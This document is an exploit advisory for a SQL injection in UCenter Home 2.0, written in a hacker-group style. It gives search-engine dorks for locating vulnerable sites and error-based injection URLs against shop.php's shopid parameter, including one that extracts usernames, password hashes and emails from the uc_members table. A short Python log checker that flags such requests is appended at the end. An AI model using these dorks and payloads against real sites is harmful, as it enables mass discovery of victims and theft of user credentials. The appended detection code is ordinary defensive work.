__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.
You edit the DB : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okey.
You use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
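
A defender-side check for the request shape described in this advisory, as an added example that is not part of the original advisory: it flags non-numeric `shopid` values on `shop.php` and the error-based markers (`floor(rand(0)*2)`, `information_schema`, `count(*)` with `group by`) in web-server request lines. The request-line format, the function names and the rule that `shopid` is always a decimal integer are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Markers of the error-based pattern quoted in this advisory, matched after
# whitespace has been removed (so "group by" appears as "groupby").
SIGNATURES = {
    "rand_floor": re.compile(r"floor\(rand\(\d*\)\*2\)"),
    "info_schema": re.compile(r"information_schema\."),
    "count_group": re.compile(r"count\(\*\).*groupby"),
    "subselect": re.compile(r"\(select"),
}

def normalize(value):
    """Undo up to three layers of URL encoding, then strip whitespace and lowercase."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", "", value).lower()

def inspect(request_line):
    """Return the list of findings for one 'METHOD target HTTP/x.y' request line."""
    m = re.match(r"^\S+ (.*) HTTP/[\d.]+$", request_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    findings = []
    if url.path.lower().endswith("/shop.php"):
        # Assumption: shopid is a decimal record id, so any other value is anomalous.
        for v in parse_qs(url.query).get("shopid", []):
            if not re.fullmatch(r"\d{1,10}", v.strip()):
                findings.append("shopid_not_integer")
    flat = normalize(url.query)
    findings += [name for name, rx in SIGNATURES.items() if rx.search(flat)]
    return findings

# Constructed sample request lines (not taken from real traffic).
SAMPLE_LOG = [
    "GET /shop.php?ac=view&shopid=253 HTTP/1.1",
    "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),"
    "concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group"
    "%20by%20x)a)%20and%201=1 HTTP/1.1",
    "GET /search.php?q=floor+plans+group+by+size HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect(line) or "clean", "<-", line[:60])
```

The integer check on `shopid` is the stronger signal of the two; the signature names only explain why a flagged line looks like the error-based pattern.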